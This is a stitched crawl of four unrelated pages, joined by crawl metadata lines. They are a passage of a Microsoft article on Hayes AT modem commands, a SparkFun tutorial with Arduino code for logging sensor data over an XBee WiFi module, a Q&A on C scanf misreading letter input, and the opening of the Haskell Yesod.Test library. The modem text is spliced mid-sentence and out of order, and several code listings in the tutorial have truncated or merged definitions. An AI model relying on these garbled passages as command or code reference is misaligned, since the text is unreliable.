delays before dialing the telephone number5551212. Example: ATD 9, 5551212 [Enter] ! : Using the Hook Flash. The exclamation point (!) dial modifier causesthe modem to go on-hook (hang up) for one-half second and is equivalent toholding down the switch-hook on your telephone for one-half second. Thisfeature is useful when transferring calls. W : Wait for a Subsequent Dial Tone. The W dial modifier causes a modem towait for an additional dial tone before dialing the numbers that followthe W. The length of time the modem waits depends on the value in S-Register S7. The modem can be instructed to dial through Private BranchExchanges (PBXs) or long-distance calling services that require delaysduring dialing. This can be done with the W command to wait for asecondary dial tone or with a comma (,) command to pause for a fixed timeand then dial. Example: ATDT 9 W 1 2155551212 [Enter] A/ : -- Repeat. This command does not use the AT prefix nor does itrequirea carriage return to enter. Typing this command causes the modem to repeatthe last command line entered, and is most useful for redialing telephonenumbers that are busy. &Fn : Factory Defaults. This command (in which n=0 or 1) returns allparameters to the selected set of factory defaults if the modem hasfactory defaults; not all modems do. H : Hang Up. This command tells the modem to go "on-hook," or disconnect,the telephone line. O : Online. This command returns the modem to the on-line mode and isusually used after the escape sequence (+++) to resume communication. Zn : Reset Modem. This command (in which n=0 or 1) resets the modem to theconfiguration profile stored in non-volatile memory location 0 or 1. Making a Call The following examples show how to place a call using several of the dialmodifiers.implementation. To manually dial the phone, you should be in your communicationssoftware'scommand mode. Lift the receiver of the telephone and dial the number you wish to call. Type ATH1 and press ENTER to connect the modem and then hang up the receiver. Type AT0 and press ENTER to tell the modem to go online. Manual Answer When the automatic answer feature (S-Register S1) is not being used,incoming calls can be answered manually by typing ATA and then pressingENTER when an incoming call is received. The modem will answer theincomingcall and enter the on-line mode.terminated by a carriage return (Enter). Mixed case set (At or aT) is notallowed. The AT sequence is called the Attention command. The Attentioncommand precedes all other commands except re-execute (A/) and the escape(+++) code. Several commands that are preceded by AT can be entered in a single linefollowed by the carriage return character. Spaces can be inserted betweencommands to increase readability, but will not be stored in the commandbuffer, the size of which is 255 characters. The backspace character canbe used to erase mistakes but is not saved as part of the contents of thecommand buffer in terminal applications. Unsupported commands will belogged and an OK or ERROR will be returned. Commands will only be accepted by the modem after the previous command hasfully executed. A command line may be canceled at any time by enteringCTRL+X. The AT sequence may be followed by any number of commands insequence, except for commands such as Z, D, or A. Commands following Z, D,or A on the same command line will be ignored. The maximum number ofcharacters on any command line is 56 (including A and T). Additional information may be found at the Hayes Web site and the USRobotics Web site. Also, your modem manufacturer may have additionalinformation about commands that your modem supports. networking Properties Article ID: 164659 - Last Review: 12/04/2015 16:29:40 -bnosurvey kbarchive kbinfo
https://support.microsoft.com/en-us/kb/164659
CC-MAIN-2016-44
refinedweb
1,339
56.45
Internet Datalogging With Arduino and XBee WiFi This Tutorial is Retired! This tutorial covers concepts or technologies that are no longer current. It's still here for you to read and enjoy, but may not be as useful as our newest tutorials. Introduction Phant is No Longer in Operation office conditions logger. Logging data to the web provides many advantages over local storage -- most significantly it gives you instant and constant access to logged data. The trade-off for that instant data access is a loss of privacy, but, if you don't care who knows what the temperature, light, or methane (well...) levels in your office are, then logging data to data.sparkfun.com is an awesomely-easy solution. Required Materials In this tutorial we'll use a variety of simple analog sensors to create an "Office Conditions Logger", but the hardware hookup and example code should be easily adaptable to more unique or complex sensors. Here's a list of stuff I used to make my logger: Some notes on this wishlisted bill of materials: - You'll also need some breadboarding tools -- a breadboard and jumper wire. - To assemble the shield you'll need soldering tools and headers. - I didn't add resistors to that list, but you'll need a few 10kΩ-22kΩ resistors to complete the circuit. If you don't already have one, we recommend grabbing an ever-handy resistor kit. - The XBee Shield can be swapped out for a Regulated Explorer, or even something as simple as an XBee Breakout, with some additional jumper wires (and maybe level shifting). - I'm using the RedBoard, but any Arduino-compatible board will work, whether it's an Uno, Leonardo or Mega. These days Arduino's have no shortage of routes to the Internet. I'm using the XBee WiFi modules because they're simple to use, relatively low-cost, and they work with XBee Shields (which you may already have in your electronics toolkit). So, while the code in this tutorial is specific to that module, it should be adaptable to the WiFi Shield, Ethernet Shield, CC3000 Shield, or whatever means your Arduino is using to access the Internet. Suggested Reading - XBee WiFi Hookup Guide -- This is a good place to start, especially if you need to get your XBee WiFi configured to connect to your WiFi network. - XBee Shield Hookup Guide -- We'll use the XBee Shield to interface the XBee WiFi with an Arduino. Learn all about the shield in this tutorial. - Analog-to-Digital Converters (ADCs) -- All of our sensors in this example are analog, so we'll be relying on the Arduino's ADC to read those analog voltages and turn them into something digital. - How to Power Your Project -- The gas sensors can consume quite a bit of power, check out this tutorial to get some ideas for how to power your project. Hardware Hookup On this page we'll discuss the schematic and wiring of this project. We can divide our circuit up into two sub-systems -- the XBee WiFi and the sensors -- and wire them separately. Connect the XBee WiFi The difficulty-level of this step depends on whether you're using a Shield (easiest), an XBee Regulated Explorer (easy-ish), or a more general XBee Breakout (easy after you've figured out level-shifting). If you're using a Shield, simply populate your headers and plug stuff in. Make sure the switch is in the DLINE position! If you're using an XBee Regulated or similar, you'll need to run four wires between the Arduino and XBee: power, ground, RX (DIN), and TX (DOUT). We've wired the XBee's DIN and DOUT pins as such: Since we're using SoftwareSerial, you can move those serial lines to any other Arduino digital pin, just don't forget to modify the code. Keep in mind that the XBee is a 3.3V device, it won't tolerate 5V on either its power or I/O lines. If you're using something really simple, like the XBee Breakout, you'll need to power the XBee off the 3.3V rail, and level shift those I/O lines! Connect Your Sensors I'm using a collection of analog sensors to monitor carbon monoxide, methane, temperature, and light conditions in the office. Here's how everything is hooked up: If you just want to try the data logging system out, don't feel required to connect all of those sensors. Heck, you can even leave all of those analog input pins floating to test everything out. Adding more complex sensors shouldn't take too much extra effort. I'll try to keep the code modular, so you can plug your own sensor-reading functions in. Configure the XBee WiFi The example code will attempt to configure your XBee -- given an SSID, passkey, and encryption mode -- but you can give it a head start by using XCTU to configure your XBee's network settings. If you have a USB Explorer or any other means for connecting your XBee to your computer, we recommend following along with the Using XCTU page of our XBee WiFi Hookup Guide to at least configure the module with your WiFi network's SSID and password. Set Up a Data Stream If this is your first SparkFun data stream, follow along here as we walk you through the process of creating a feed. Create a Feed To begin, "methane", "co", "temp" and "light" to describe the readings. Once you've figured all of that out, click Create!. Anatomy of a Feed After you've created your feed you'll be led to the stream's key page. Copy down all of the information on this page! Better yet, take advantage of the "Email a Copy" section at the bottom to get a more permanent copy of the keys. A quick overview on the keys: - Public Key -- This is a long hash that is used to identify your stream and provide a unique URL. This key is publicly visible -- anyone who visits your stream's URL will be able to see this hash. - Private Key -- The private key is required in order to post data to the stream. Only you should know this key. - Delete Key -- Normally you'll want to avoid this key, as it will delete your stream in its entirety. If you messed up -- maybe you want to add or modify a field -- this key, and the delete URL, may come in handy. - Fields -- Not highlighted in the image above are the four fields we defined when we were creating this stream -- "methane", "co", "temp" and "light". Those fields are used to set specific values and create a new log of data. Check out the example under "Logging using query string params" to see how those fields are used. Now that you've created your stream, and have the hardware set up, you have everything you need to start coding. To the next page! Modify and Upload the Code Download and Install the Phant Arduino Library The sensational creators of the SparkFun data stream service have developed an Arduino library to make posting data to a stream as easy as can be. The Phant Arduino library helps to manage keys and fields, and even assembles HTTP POSTs for you to send to a server. Head over to the phant-arduino GitHub repo to download a copy (click the "Download ZIP" link on the bottom-right side of the page) or click here if you want to avoid a trip to GitHub. Install the library by extracting it to the libraries folder within your Arduino sketchbook. Check out our Installing an Arduino Library tutorial for help with that. Download and Modify the Example Code Click here to download the example sketch or copy and paste from below: language:c /***************************************************************** Phant_XBee_WiFi.ino Post data to SparkFun's data stream server system (phant) using an XBee WiFi and XBee Shield. Jim Lindblom @ SparkFun Electronics Original Creation Date: May 20, 2014 This sketch uses an XBee WiFi and an XBee Shield to get on the internet and POST analogRead values to SparkFun's data logging streams (). Hardware Hookup: The Arduino shield makes all of the connections you'll need between Arduino and XBee WiFi. If you have the shield make sure the SWITCH IS IN THE "DLINE" POSITION. I've also got four separate analog sensors (methane, co, temperature, and photocell) connected to pins A0-A3. Feel free to switch that up. You can post analog data, digital data, strings, whatever you wish to the Phant server. Requires the lovely Phant library: Development environment specifics: IDE: Arduino 1.0.5 Hardware Platform: SparkFun RedBoard XBee Shield & XBee WiFi (w/ trace antenna)> // The Phant library makes creating POSTs super-easy #include <Phant.h> // Time in ms, where we stop waiting for serial data to come in // 2s is usually pretty good. Don't go under 1000ms (entering // command mode takes about 1s). #define COMMAND_TIMEOUT 2000 // ms //////////////////////// // WiFi Network Stuff // //////////////////////// // Your WiFi network's SSID (name): String WIFI_SSID = "WIFI = "WIFI_PASSWORD_HERE"; ///////////////// //", "Public_Key", "Private_Key"); // Phant field string defintions. Make sure these match the // fields you've defined in your data stream: const String methaneField = "methane"; const String coField = "co"; const String tempField = "temp"; const String lightField = "light"; //////////////// //) ///////////////////////////// // Sensors/Input Pin Stuff // ///////////////////////////// const int lightPin = A0; // Photocell input const int tempPin = A1; // TMP36 temp sensor input const int coPin = A2; // Carbon-monoxide sensor input const int methanePin = A3; // Methane sensor input // opVoltage - Useful for converting ADC reading to voltage: const float opVoltage = 4.7; float tempVal; int lightVal, coVal, methaneVal; ///////////////////////// // Update Rate Control // ///////////////////////// // Phant limits you to 10 seconds between posts. Use this variable // to limit the update rate (in milliseconds): const unsigned long UPDATE_RATE = 300000; // 300000ms = 5 minutes unsigned long lastUpdate = 0; // Keep track of last update time /////////// // Setup // /////////// // In setup() we configure our INPUT PINS, start the XBee and // SERIAL ports, and CONNECT TO THE WIFI NETWORK. void setup() { // Set up sensor pins: pinMode(lightPin, INPUT); pinMode(coPin, INPUT); pinMode(methanePin, INPUT); pinMode(tempPin, INPUT); // Set up serial ports: Serial.begin(9600); // Make sure the XBEE BAUD RATE matches its pre-set value // (defaults to 9600). xB.begin(XBEE_BAUD); // Set up WiFi network Serial.println("Testing network"); // connectWiFi will attempt to connect to the given SSID, using // encryption mode "encrypt", and the passphrase string given. connectWiFi(WIFI_SSID, WIFI_EE, WIFI_PSK); // Once connected, print out our IP address for a sanity check: Serial.println("Connected!"); Serial.print("IP Address: "); printIP(); Serial.println(); // setupHTTP() will set up the destination address, port, and // make sure we're in TCP mode: setupHTTP(destIP); // Once everything's set up, send a data stream to make sure // everything check's out: Serial.print("Sending update..."); if (sendData()) Serial.println("SUCCESS!"); else Serial.println("Failed :("); } ////////// // Loop // ////////// // loop() constantly checks to see if enough time has lapsed // (controlled by UPDATE_RATE) to allow a new stream of data // to be posted. // Otherwise, to kill time, it'll print out the sensor values // over the serial port. void loop() { // If current time is UPDATE_RATE milliseconds greater than // the last update rate, send new data. if (millis() > (lastUpdate + UPDATE_RATE)) { Serial.print("Sending update..."); if (sendData()) Serial.println("SUCCESS!"); else Serial.println("Failed :("); lastUpdate = millis(); } // In the meanwhile, we'll print data to the serial monitor, // just to let the world know our Arduino is still operational: readSensors(); // Get updated values from sensors Serial.print(millis()); // Timestamp Serial.print(": "); Serial.print(lightVal); Serial.print('\t'); Serial.print(tempVal); Serial.print('\t'); Serial.print(coVal); Serial.print('\t'); Serial.println(methaneVal); delay(1000); } //////////////// // sendData() // //////////////// // sendData() makes use of the PHANT LIBRARY to send data to the // data.sparkfun.com server. We'll use phant.add() to add specific // parameter and their values to the param list. Then use // phant.post() to send that data up to the server. int sendData() { xB.flush(); // Flush data so we get fresh stuff in // IMPORTANT PHANT STUFF!!! // First we need to add fields and values to send as parameters // Since we just need to read values from the analog pins, this // can be automized with a for loop: readSensors(); // Get updated values from sensors. phant.add(tempField, tempVal); phant.add(lightField, lightVal); phant.add(methaneField, methaneVal); phant.add(coField, coVal); // After our PHANT.ADD's we need to PHANT.POST(). The post needs // to be sent out the XBee. A simple "print" of that post will // take care of it. xB.print(phant.post()); // Check the response to make sure we receive a "200 OK". If // we were good little programmers we'd check the content of // the OK response. If we were good little programmers... char response[12]; if (waitForAvailable(12) > 0) { for (int i=0; i<12; i++) { response[i] = xB.read(); } if (memcmp(response, "HTTP/1.1 200", 12) == 0) return 1; else { Serial.println(response); return 0; // Non-200 response } } else // Otherwise timeout, no response from server return -1; } // readSensors() will simply update a handful of global variables // It updates tempVal, lightVal, coVal, and methaneVal void readSensors() { tempVal = ((analogRead(tempPin)*opVoltage/1024.0)-0.5)*100; tempVal = (tempVal * 9.0/5.0) + 32.0; // Convert to farenheit lightVal = analogRead(lightPin); methaneVal = analogRead(methanePin); coVal = analogRead(coPin); } /////////////////////////// // XBee WiFi Setup Stuff // /////////////////////////// // setupHTTP() sets three important parameters on the XBee: // 1. Destination IP -- This is the IP address of the server // we want to send data to. // 2. Destination Port -- We'll be sending data over port 80. // The standard HTTP port a server listens to. // 3. IP protocol -- We'll be using TCP (instead of default UDP). void setupHTTP(String address) { // Enter command mode, wait till we get there. while (!commandMode(1)) ; // Set IP (1 - TCP) command("ATIP1", 2); // RESP: OK // Set DL (destination IP address) command("ATDL" + address, 2); // RESP: OK // Set DE (0x50 - port 80) command("ATDE50", 2); // RESP: OK commandMode(0); // Exit command mode when done } /////////////// // printIP() // /////////////// // Simple function that enters command mode, reads the IP and // prints it to a serial terminal. Then exits command mode. void printIP() { // Wait till we get into command Mode. while (!commandMode(1)) ; // Get rid of any data that may have already been in the // serial receive buffer: xB.flush(); // Send the ATMY command. Should at least respond with // "0.0.0.0\r" (7 characters): command("ATMY", 7); // While there are characters to be read, read them and throw // them out to the serial monitor. while (xB.available() > 0) { Serial.write(xB.read()); } // Exit command mode: commandMode(0); } ////////////////////////////// // connectWiFi(id, ee, psk) // ////////////////////////////// // For all of your connecting-to-WiFi-networks needs, we present // the connectWiFi() function. Supply it an SSID, encryption // setting, and passphrase, and it'll try its darndest to connect // to your network. int connectWiFi(String id, byte auth, String psk) { const String CMD_SSID = "ATID"; const String CMD_ENC = "ATEE"; const String CMD_PSK = "ATPK"; // Check if we're connected. If so, sweet! We're done. // Otherwise, time to configure some settings, and print // some status messages: int status; while ((status = checkConnect(id)) != 0) { // Print a status message. If `status` isn't 0 (indicating // "connected"), then it'll be one of these // (from XBee WiFI user's manual): // 0x01 - WiFi transceiver initialization in progress. // 0x02 - WiFi transceiver initialized, but not yet scanning // for access point. // 0x13 - Disconnecting from access point. // 0x23 – SSID not configured. // 0x24 - Encryption key invalid (either NULL or invalid // length for WEP) // 0x27 – SSID was found, but join failed. 0x40- Waiting for // WPA or WPA2 Authentication // 0x41 – Module joined a network and is waiting for IP // configuration to complete, which usually means it is // waiting for a DHCP provided address. // 0x42 – Module is joined, IP is configured, and listening // sockets are being set up. // 0xFF– Module is currently scanning for the configured SSID. // // We added 0xFE to indicate connected but SSID doesn't match // the provided id. Serial.print("Waiting to connect: "); Serial.println(status, HEX); commandMode(1); // Enter command mode // Write AH (2 - Infrastructure) -- Locked in command("ATAH2", 2); // Write CE (2 - STA) -- Locked in command("ATCE2", 2); // Write ID (SparkFun) -- Defined as parameter command(CMD_SSID + id, 2); // Write EE (Encryption Enable) -- Defined as parameter command(CMD_ENC + auth, 2); // Write PK ("sparkfun6175") -- Defined as parameter command(CMD_PSK + psk, 2); // Write MA (0 - DHCP) -- Locked in command("ATMA0", 2); // Write IP (1 - TCP) -- Loced in command("ATIP1", 2); commandMode(0); // Exit Command Mode CN delay(2000); } } // Check if the XBee is connected to a WiFi network. // This function will send the ATAI command to the XBee. // That command will return with either a 0 (meaning connected) // or various values indicating different levels of no-connect. byte checkConnect(String id) { char temp[2]; commandMode(0); while (!commandMode(1)) ; command("ATAI", 2); temp[0] = hexToInt(xB.read()); temp[1] = hexToInt(xB.read()); xB.flush(); if (temp[0] == 0) { command("ATID", 1); int i=0; char c=0; String atid; while ((c != 0x0D) && xB.available()) { c = xB.read(); if (c != 0x0D) atid += c; } if (atid == id) return 0; else return 0xFE; } else { if (temp[1] == 0x13) return temp[0]; else return (temp[0]<<4) | temp[1]; } } ///////////////////////////////////// // Low-level, ugly, XBee Functions // ///////////////////////////////////// void command(String atcmd, int rsplen) { xB.flush(); xB.print(atcmd); xB.print("\r"); waitForAvailable(rsplen); } int commandMode(boolean enter) { xB.flush(); if (enter) { char c; xB.print("+++"); // Send CMD mode string waitForAvailable(1); if (xB.available() > 0) { c = xB.read(); if (c == 'O') // That's the letter 'O', assume 'K' is next return 1; // IF we see "OK" return success } return 0; // If no (or incorrect) receive, return fail } else { command("ATCN", 2); return 1; } } int waitForAvailable(int qty) { int timeout = COMMAND_TIMEOUT; while ((timeout-- > 0) && (xB.available() < qty)) delay(1); return timeout; } byte hexToInt(char c) { if (c >= 0x41) // If it's A-F return c - 0x37; else return c - 0x30; } Wait! Before you get on with uploading that code to your Arduino, there are a few variable constants you'll need to modify. Define Your WiFi Network The example code does its best to set up the XBee WiFi with your WiFi network's unique settings. Under the "WiFi Network Stuff" section, you'll need to fill in your WiFi's SSID, encryption mode, and passkey (if applicable). language:c //////////////////////// // WiFi Network Stuff // //////////////////////// // Your WiFi network's SSID (name): String WIFI_SSID = "network = "network_passphrase_here"; For the encryption setting, we've created an enumerated type, which will corral that variable into one of four possible values: open (no passphrase), WPA TKIP, WPA2 AES, or WEP. Set Up Phant Stuff All of the keys and fields you defined during the stream creation process come into play next. Follow the directions in the comments to add your data stream's public key, private key, and data fields. language:c ///////////////// //","5Jzx1x8Epgfld3GVzdpo","7BdxZxyVj6Flq5Wn6qVM"); // Phant field string defintions. Make sure these match the // fields you've defined in your data stream: const String methaneField = "methane"; const String coField = "co"; const String tempField = "temp"; const String lightField = "light"; Unless you're using a server of your own (good on you!), leave the destIP and "data.sparkfun.com" values alone. That random IP address ( 54.86.132.254) DNS's to data.sparkfun.com. In this section we're creating an instance of the Phant class called phant, which we'll reference later on in the sketch. Check out the library's Readme file for more explanation of the Phant library. Set Up XBee WiFi Stuff The next section sets up communication with the XBee. If you're using the shield (or the setup from the "Hardware Hookup" page), and your XBee is set to a default baud rate, you can most likely leave this section alone. language:c //////////////// //) If you've customized the pin connections, adjust the XB_RX and XB_TX variables accordingly. Same goes for the XBEE_BAUD variable, if you've modified your XBee's baud rate. Setting the Update Rate The code is configured to send an updated log just about every 5 minutes. You can turn the update speed up or down by adjusting the UPDATE_RATE variable. This value is defined in milliseconds, so it'll take a bit of math to convert from a desired minute-ish rate. language:c ///////////////////////// // Update Rate Control // ///////////////////////// // Phant limits you to 10 seconds between posts. Use this variable // to limit the update rate (in milliseconds): const unsigned long UPDATE_RATE = 300000; // 300000ms = 5 minutes SparkFun's Phant service limits you to one update every 10 seconds, so don't drop the update rate below 10000. Upload the Code and Test Once you've made those adjustments, you can safely upload the code. After you've sent the sketch to your Arduino, open up the Serial Monitor to get an idea of what's going on. If your XBee isn't already connected to a network, it may take a few moments to get the handshakes and DHCP arranged with the router. A few Waiting to connect: XX messages may flow by every couple of seconds indicating the various phases of connecting. (If you're curious, the meaning of those "XX" values are explained in the connectWiFi function.) Once the XBee is connected, we'll attempt to post our first log of data. You should see a Sending Update... message, followed quickly by SUCCESS!. If you got a success message, go refresh your public stream URL! If your message fails to log, an error message will be printed -- in that case double-check that everything is defined correctly (these things are case-sensitive). In addition to posting to the web, the sensor readings will begin to stream in the serial monitor...it gives the Arduino something to do in between updates. Using the Phant Library The real meat of the server-logging action occurs in the sendData() function. This function achieves two goals: it reads the sensor values, then packages those up into a Phant update to send to our server. The real key to using the Phant library is the phant.add([field], [value]) function. Since we have four fields to update, we need to make four unique calls of this function to set our four values: language:c phant.add(tempField, tempVal); // Write in the temperature field "temp" and value phant.add(lightField, lightVal); // Write in the light field "temp" and value phant.add(methaneField, methaneVal); // Write in the methane field "temp" and value phant.add(coField, coVal); // Write in the carbon-monoxide field "temp" and value If you have more or less data fields in your stream, you'll need to adjust those four lines accordingly. Once we've made our phant.add()'s, the last step is to send the data off to the server. In this case we combine a software serial print (to send data to the XBee) with the phant.post() function. language:c // After our PHANT.ADD's we need to PHANT.POST(). The post needs // to be sent out the XBee. A simple "print" of that post will // take care of it. xB.print(phant.post()); That's all there is to it. The XBee will route that post out to the server it's connected to, and your Arduino can get on with reading sensors or constructing a new post. Resources and Going Further Mmmm data. But once you've logged your data to the Internet, what's next? Here are some ideas. Using the Data Once you have the data stream running, you have a few tools to view and manipulate the data. You can download it as either a CSV or JSON, by clicking the links at the top of the page. Then you can import those files into a spreadsheet or one of many online plotting services. We're big fans of Plot.ly, which you can use to generate beautiful graphs, like this: Add Your Own Sensors! Unfortunately, the least flexible part of the example code is the most wide-open, fun part: customizing it with your own sensors. To update sensor readings, we defined a function -- readSensors() -- which reads our sensors and updates a global variable to store each value. Feel free to plug your own machinations into that function, customize the variables, or even add more! If you're adding or removing sensors, don't forget to modify the Phant fields, and add or remove Phant.add() function calls to get your data into the HTTP POST. For example, I wanted to increase the reliability of my logger's data, so I replaced the analog light and temperature sensors with digital options -- the TSL2561 luminosity sensor and an HTU21D Humidity/Temperature sensor. That meant adding a pair of Arduino libraries to read from those sensors, and modifying the code a bit. If you want to check out my advanced example, click here to download the sketch. You can see how I modified the code to add a fifth data field (humidity), and incorporated more complex sensor data gathering for the digital sensors. There are a plethora of sensors out there, what are you going to log? Weather is always a popular option; perhaps you can turn out a version of our wireless weather station data logger, which uses an Electric Imp instead of Arduino/XBee. Or how about making the project wearable with a LilyPad XBee? That's where I'm headed next. This tutorial is only the start, we can't wait to see what you do with data.sparkfun.com!
https://learn.sparkfun.com/tutorials/internet-datalogging-with-arduino-and-xbee-wifi
CC-MAIN-2020-45
refinedweb
4,232
63.39
SciChart® the market leader in Fast WPF Charts, WPF 3D Charts, iOS Chart, Android Chart and JavaScript Chart Components Hi guys, I have two SciCharts, and a different custom modifier on each of them. I have utilised the Mouse:MouseManager.MouseEventGroup=”MySharedMouseGroup” logic to share mouse events between the two charts. The problem is, I would like Chart A to handle its own MouseMove events, and share those to Chart B, but Chart B should handle its own MouseMove events (and those sent from Chart A obviously) but not send anything back to Chart A’s modifiers. I have noticed that there are some base properties from UIElement called “IsMouseOver” which should let me handle this (i.e. in Chart B’s OnModifierMouseMove method it could check IsMouseOver and if false, simply return. That way, the message is still being shared between A and B, but B just ignores A’s messages), but unfortunately I find this IsMouseOver property to always be false, no matter where the pointer is. How would you guys recommend I tackle this problem? As an example of the problem, let’s say you have two SciCharts, each with their own RolloverModifier, and their ModifierGroup shares a MouseEventGroup “MySharedMouseGroup”. You want one chart to display a rollover on both surfaces when the Mouse moves over it, but the other to display a rollover on just its own surface when the mouse is over it. Cheers, Miles Hi Miles, I have an idea for you! There is a property in the ModifierMouseArgs called IsMaster. When this is true, the modifier triggered the event, else it is getting it from another modifier. To make use of this, try the following: // Note: not compiled this, but it demonstrates the principle public class IgnoresSlaveEventsRolloverModifier : RolloverModifier { public override void OnModifierMouseMove(ModifierMouseArgs e) { if (e.IsMaster) { base.OnModifierMouseMove(e); } } } Now register the IgnoresSlaveEventsRolloverModifier on your first chart and use a normal RolloverModifier on the second chart. Mouse over the first chart and both should receive the event, but mouse over the second and only the second should receive the event.
https://www.scichart.com/questions/wpf/sharing-mouse-events-one-way
CC-MAIN-2020-45
refinedweb
348
58.62
Global Variables Global Variables I'm having a heck of a time trying to set a global variable and reference it from within a controller. Has anyone done this with Architect? I saw a mention of creating a custom class and doing it that way () but I can't seem to reference it correctly in Architect. I tried adding it as a controller (MyApp.controller.Utils), but then I can't see how you "require" it in the Application itself. Any help would be appreciated. Thanks. The whole point is to get rid of the global namespace not to clutter JavaScript. Are you trying to set/get an external variable (from another JavaScript library for example) or are you trying to have your own global variables? The few global vaiables I have in my projects I add to an object with the same name as the project, for example VPCalcTouch.config and then add properties to that one. Easy to access and debug. I also use this to load up the defaults from the server by inserting a JS snippet in the app.html file. HtH, /Mattias I'm all for keeping everything clean. This would be an environment variable (dev, staging, qa, production) that would be set initially passed into the application on initial load. From here, the app then knows which server to get data from. I'm just trying to set this variable so my service calls connect to the correct server. We're not using Sencha cmd, so I'm trying to set this on app load. Just adding the variables to your app's namespace would make them accessible everywhere in your project and keep the namespace clean. Set them initially in Application.init() function to make sure they are available to all components in the application before they start to run their own init(). OK, I guess this is where I'm unsure how to do this from within Sencha Architect. In the panel there is not "init" function...there is a launch and Loader Config. I can create an "init" function in the "functions" section, or is there an override needed of "init"? I tried setting MyApp.app.config.environment = "dev"; within the "launch" function and referencing that variable from my controller, but that did not work. I also tried doing MyApp.config.environment = "dev"; which also failed. Thanks. You should add a function init to the Application object at the top of the Project Inspector, see: The code in init() should be along the lines (remember to create the property "config" before assigning parameters and also remember not to redefine your app's namespace): Code: VPCalcDesktop.config = VPCalcDesktop.config || {}; VPCalcDesktop.config.eff_olja = 92.0; VPCalcDesktop.config.eff_ved = 75.0; VPCalcDesktop.config.eff_flis = 90.0; VPCalcDesktop.config.eff_pellets = 85.0; VPCalcDesktop.config.eff_fjarrv = 100.0; VPCalcDesktop.config.eff_el = 100.0; HtH, /Mattias Last edited by tangix; 16 May 2013 at 6:33 AM. Reason: typos, typos Ah, that got it...thanks for the screencast Thanks for all the help with this. I've been trying for 6 hours adding and removing variables trying to figure this all out. Yeah, there's more than one way to code in JavaScript. I agree that Mitchell's way in his post is a nice one, and the trick in Sencha Architect to configure this is to click on the menuitem "Class >" in the + menu in the Project Inspector - this generates a clean class (works also with Stores btw). Add the properties in the Config panel or in code. Another trick is then that you need to type the name in as a require on the Application node in Project Inspector - the interface for configuring model, stores, views or controller (with drop-down menus) doesn't work for defined classes for some reason. However, in my apps I have configuration coming from the server via app.html and getting that data into a class à la Mitchell would be challenging. Anyway, glad to hear you are on your way to the next challenge in your project. Happy Coding! /Mattias - I love being a dad (5 & 7), flying airplanes (KBED) and writing code (spaghetti). BostonMerlin aka John Bond aka JB See U @ SenchaCon '13 OK, one last question...how is everyone getting this information into their app initially? For the environment, I can just use the host name where the app is being served from, but what if I needed to pass in extra params to the app? When we had this written in Flex, I liked setting these items to the page, then having the app read the params via scripting. Any suggestions for this? Thanks all.
http://www.sencha.com/forum/showthread.php?263769
CC-MAIN-2014-41
refinedweb
780
63.9
Wpf project data access layer jobs The details of the project can be found in the attached PDF. have coding for player in java. I want the player as exe for desktop .. Rekisteröidy tai kirjaudu sisään nähdäksesi tied a couple of slider photos resized so they look properly in layerslider Wordpress. I need algorithm to create custom ruler (vertical (left + right) , horizontal) to show it. From .cs file in run time will be passed following information: [kirjaudu nähdäksesi URL:n] of main divisions [kirjaudu nähdäksesi URL:n] of small divisions (usually 10 but it can be different) [kirjaudu nähdäksesi URL:n] step for main divisions [kirjaudu nähdäksesi The secret key generation in physical layer security achievement through Reinforcement learning algorithms Rekisteröidy tai kirjaudu sisään nähdäksesi tiedot.. [kirjaudu nähdäksesi URL:n] as a main skill.(namespaces, access modifiers) -Basic knowledge of git. Including branching, and merging. -MVVM Experience. -Portfolio with projects with similar requirements as the expected by us. About Hiroku Hir... items in a gridview WPF and .net expert needed for We need made a update from our c++ software layout and need made it on WPF. Need only the designed forms. Look our new layout on adobe xd: [kirjaudu nähdäksesi URL:n] I am looking for a lawyer in india. Only bid if you are in India. closer to Dahej bypass road ,Bharuch, the better. . Please have experience with working with freelancer in India about disputes. [kirjaudu nähdäksesi URL:n] enabled. I found some similiar issues ([kirjaudu nähdäksesi URL:n]; No drop with basic gongsolution sample; Drag and Drop forbidden on panel even though AllowDrop is set to true) but not answer. This is I need WPF app should : 1- has ability to play video from url ( list 3 urls with videos . example :" [kirjaudu nähdäksesi URL:n][kirjaudu nähdäksesi URL:n]" )'m geophysics researcher, and need instrument to show my result. I have folders with geotiffs, and need python module to visualize 3 layers of geo data.
https://www.fi.freelancer.com/job-search/wpf-project-data-access-layer/
CC-MAIN-2018-34
refinedweb
328
65.93
I would like use scanf() Q 1 3 U 2 6 Q 2 5 U 4 8 #include <stdio.h> #include <stdlib.h> void main() { int *a; int i, j; a = (int *) malloc(4 * 3 *sizeof(int)); printf("input:\n"); for (i = 0; i < 4; i++) { for (j = 0; j < 3; j++) { scanf("%d", a + 3 * i + j); } } printf("output:\n"); for (i = 0; i < 4; i++) { for (j = 0; j < 3; j++) { printf("%d ", a[3*i+j]); } printf("\n"); } } Q 1 3 This happens because you provided a non-numeric input to your program that wants to read a number with %d. Since Q is not a number, scanf fails. However, your program is not paying attention to the return value of scanf, and keeps calling it in the failed state. The program thinks that it is getting some data, while in fact it does not. To fix this, change the code to pass %c or %s when it reads the non-numeric character, check the return value of scanf, and get rid of invalid input when scanf fails. When you call scanf, it returns how many values corresponding to % specifiers it has provided. Here is how to check the return value of scanf: if (scanf("%d", a + 3 * i + j) == 1) { ... // The input is valid } else { fscanf(f, "%*[^\n]"); // Ignore to end of line }
https://codedump.io/share/GRGoQnZ29Ssl/1/why-scanf-cannot-read-my-input
CC-MAIN-2017-43
refinedweb
227
75.64
{-# LANGUAGE OverloadedStrings #-} {-# LANGUAGE PackageImports #-} {-| Yesod.Test is a pragmatic framework for testing web applications built using wai and persistent. By pragmatic I may also mean 'dirty'. It's main goal is to encourage integration and system testing of web applications by making everything /easy to test/. Your tests are like browser sessions that keep track of cookies and the last visited page. You can perform assertions on the content of HTML responses, using css selectors to explore the document more easily. You can also easily build requests using forms present in the current page. This is very useful for testing web applications built in yesod for example, were your forms may have field names generated by the framework or a randomly generated '_nonce' field. Your database is also directly available so you can use runDB to set up backend pre-conditions, or to assert that your session is having the desired effect. -} module Yesod.Test ( -- * Declaring and running your test suite runTests, describe, it, Specs, OneSpec, -- * Making requests -- | To make a request you need to point to an url and pass in some parameters. -- -- To build your parameters you will use the RequestBuilder monad that lets you -- add values, add files, lookup fields by label and find the current -- nonce value and add it to your request too. -- post, post_, get, get_, doRequest, byName, fileByName, -- | Yesod cat auto generate field ids, so you are never sure what -- the argument name should be for each one of your args when constructing -- your requests. What you do know is the /label/ of the field. -- These functions let you add parameters to your request based -- on currently displayed label names. byLabel, fileByLabel, -- | Does the current form have a _nonce? Use any of these to add it to your -- request parameters. addNonce, addNonce_, -- * Running database queries runDB, -- * Assertions assertEqual, assertHeader, 